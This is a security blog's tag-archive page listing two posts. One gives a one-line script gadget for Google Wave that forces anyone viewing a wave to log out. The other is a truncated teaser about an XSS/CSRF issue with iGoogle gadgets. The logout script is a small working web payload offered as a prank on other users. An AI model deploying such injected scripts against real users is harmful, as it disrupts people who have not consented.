Tag Archives: xml

Google Wave – Make your friends logout gadget

Posted on November 20, 2009 by Fernando

Adding this gadget to any wave will make people log out when they see it: http://beford.org/stuff/waveg.xml The code: <script type=”text/javascript”> top.location=”https://wave.google.com/wave/logout”; </script>

Posted in Uncategorized | Tagged csrf, google, Security, wave, xml, XSS | 3 Comments

Google Gadgets XSS (IE6/Opera)

Posted on November 25, 2007 by Fernando

There is a recent discussion on ha.ckers.org regarding a possible CSRF that could allow an attacker to inject an evil gadget on someobdy else’s iGoogle page. After checking the format of the xml file used to define the gadgets properties, … Continue reading →

Posted in English, Security, XSS | Tagged google, ie, Security, xml, XSS | 2 Comments

Tag Archives: xml

Google Wave – Make your friends logout gadget

Google Gadgets XSS (IE6/Opera)

Archives

Meta